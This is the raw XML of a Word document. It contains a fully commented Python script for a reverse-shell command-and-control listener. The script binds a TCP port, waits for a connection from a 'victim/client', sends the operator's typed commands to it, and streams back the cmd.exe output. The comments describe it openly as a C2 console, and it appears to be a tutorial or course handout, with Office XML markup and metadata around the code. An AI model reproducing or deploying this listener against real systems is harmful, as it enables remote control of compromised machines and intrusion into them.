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D759A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import socket                                          # Import the standard socket library to enable low-level TCP/IP network communications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F95766D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import subprocess                                      # Import subprocess to allow running system commands (though not directly invoked in this snippet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ED1981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import sys                                             # Import sys to interact with system-specific parameters and functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F81E8A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import time                                            # Import time to handle execution pauses and sleep timers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB86234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import threading                                       # Import threading to run tasks concurrently without freezing the main execution loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029C6F70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import asyncio                                         # Import asyncio for asynchronous functionality (imported but kept as an alternative approach here).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466BC99E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import io                                              # Import io to manage stream handling and in-memory text/binary data buffers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30229981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import os                                              # Import os to interact with the underlying operating system commands and process lifecycle control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A67B1F2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#import readline                                       # Commented out import for terminal interactive line editing and history management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372260B7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import colorama                                        # Import colorama to easily enable stylized, multi-colored text output in the terminal console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE5111E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from colorama import Fore, Back, Style                 # Extract specific text attributes (Fore=Foreground color, Back=Background, Style=Font style).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACE6E10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</w:p>
    <w:p w14:paraId="1C611E34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#receive the cmd.exe shell command output from the client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D061D1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def shellreceiver(conn):                               # Define an asynchronous thread target function to receive execution output from the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59458037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 xml:space="preserve">    while True:                                            # Enter an infinite loop to continually monitor the socket for incoming data streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A54B065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 xml:space="preserve">        try:                                                   # Initialize error handling context to insulate the execution block against network disconnect errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFFFA8A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 xml:space="preserve">            data=conn.recv(1)                                      # Read incoming data from the established socket connection 1 byte at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B76E4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 xml:space="preserve">            print(data.decode(), end="", flush=True)               # Decode the raw binary stream data into readable text and print it immediately to the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644D0548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 xml:space="preserve">        except:                                                # Error management catch block: If data reading fails, assume the connection dropped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D0900B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 xml:space="preserve">            print("server/socket must have died...time to hop off")            # Print warning output indicating socket termination states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5132DD9F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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            conn.close()                                           # Gracefully terminate the communication line to free up local network resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276CFEB2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 xml:space="preserve">            os._exit(0)                                            # Force close the entire Python server process immediately with exit status 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B73B5A7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</w:p>
    <w:p w14:paraId="410C89FB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#send our command we'd like executed on the victim/client!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19163282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def shellsender(conn):                                 # Define an asynchronous thread target function to prompt the operator and send commands to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039C7448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 xml:space="preserve">    while True:                                            # Enter an infinite loop to continuously accept instructions from the C2 console operator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24259379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 xml:space="preserve">        mycmd=input("")                                        # Halt execution and wait for the server operator to type a command into the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50974DF7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 xml:space="preserve">        mycmd=mycmd+"\n"                                       # Append a newline character to signify the command termination/execution trigger for the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5796E1BC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 xml:space="preserve">        try:                                                   # Open error safety wrapper block for data serialization and network transmission lines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525EBD71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 xml:space="preserve">            conn.send(mycmd.encode())                              # Convert the string command into a raw byte stream and transmit it across the network socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17967138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 xml:space="preserve">        except:                                                # Error management: Catch connection breakages while attempting transmission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01822AAB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 xml:space="preserve">            print("server/socket must have died...time to hop off")            # Print alert noting the connection failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AB93DF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 xml:space="preserve">            conn.close()                                           # Safely close the active network link descriptor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4654C33B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 xml:space="preserve">            os._exit(0)                                            # Immediate operational shutdown of the active Python script runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD27F22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</w:p>
    <w:p w14:paraId="726406E0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host = "0.0.0.0"                                       # Set the binding interface. '0.0.0.0' configures the server to listen on all available network cards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0268C32E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port = 4546                                            # Specify the network port identification integer where the C2 listener will establish its presence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08145C4F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</w:p>
    <w:p w14:paraId="1025F6B4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s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # Instantiate an IPv4 (AF_INET) TCP-based (SOCK_STREAM) streaming network socket interface object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B76241C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s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)# Allow immediate port reuse, preventing 'Address already in use' errors if the server restarts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5410C4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s.bind((host, port))                                   # Bind the socket structural configuration firmly to our designated IP host and network port parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A13EF15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lastRenderedPageBreak/>
        <w:t>s.listen(5)                                            # Turn on network listening capabilities, allowing a backlog queue of up to 5 inbound connection requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C7B97C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print(Fore.YELLOW + "[+] listening on port "+str(port), Fore.WHITE)# Notify the console operator in yellow text that the C2 server is actively waiting on the target port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E237265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</w:p>
    <w:p w14:paraId="40E8728F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conn, addr = s.accept()                                # Block program execution here until an inbound target client initializes a raw handshake connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307F9C49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print(Fore.GREEN, f'\n[*] Accepted new connection from: {addr[0]}:{addr[1]}', Fore.WHITE)# Once a client connects, print a success notice tracking the client's external IP address and source port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9B692C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</w:p>
    <w:p w14:paraId="271E8FDB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#New code starts here. This initiates our threads!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A819A5A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##################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390B47B6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s2p_thread = threading.Thread(target=shellreceiver, args=[conn, ])# Create a dedicated thread tasked exclusively with executing the background data collection loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CAE2DE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s2p_thread.daemon = True                               # Set the thread as a background daemon process so it automatically terminates when the main script shuts down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026E18A6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s2p_thread.start()                                     # Spin up and kick off the receiving thread execution path immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B43C0C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</w:p>
    <w:p w14:paraId="21706FFD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s2p_thread = threading.Thread(target=shellsender, args=[conn, ])# Create a separate, isolated background thread targeting the terminal transmission loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7184FD0C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s2p_thread.daemon = True                               # Configure this thread as a daemon process to prevent orphan loops from hanging open upon exit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ECA1C9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s2p_thread.start()                                     # Spin up and begin execution of the input/transmission loop pathway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32074934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##################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9017AC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</w:p>
    <w:p w14:paraId="1EE8FBC6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#continuous loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0FB00C" w14:textId="77777777" w:rsidR="00000000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>while True:                                            # Maintain a persistent execution baseline loop to keep the parent script active indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E1A363" w14:textId="77777777" w:rsidR="0076754A" w:rsidRPr="00BD6CBC" w:rsidRDefault="00000000" w:rsidP="00BD6CBC">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD6CBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">    time.sleep(1)                                      # Throttle loop iterations to prevent excessive CPU core utilization spikes.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0076754A" w:rsidRPr="00BD6CBC" w:rsidSect="00B561B0">
      <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
      <w:pgMar w:top="1334" w:right="1440" w:bottom="13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4A9"/>
    <w:rsid w:val="0076754A"/>
    <w:rsid w:val="007E75D8"/>
    <w:rsid w:val="008D0FA6"/>
    <w:rsid w:val="00AC74A9"/>
    <w:rsid w:val="00B561B0"/>
    <w:rsid w:val="00BD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ED47C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EFDF714C-3952-4310-B71B-A9B38BC8E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D6CB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D6CB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1090</Words>
  <Characters>6217</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>51</Lines>
  <Paragraphs>14</Paragraphs>
  <ScaleCrop>false</ScaleCrop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 Beshel</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Promise Beshel</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-19T02:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-19T02:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>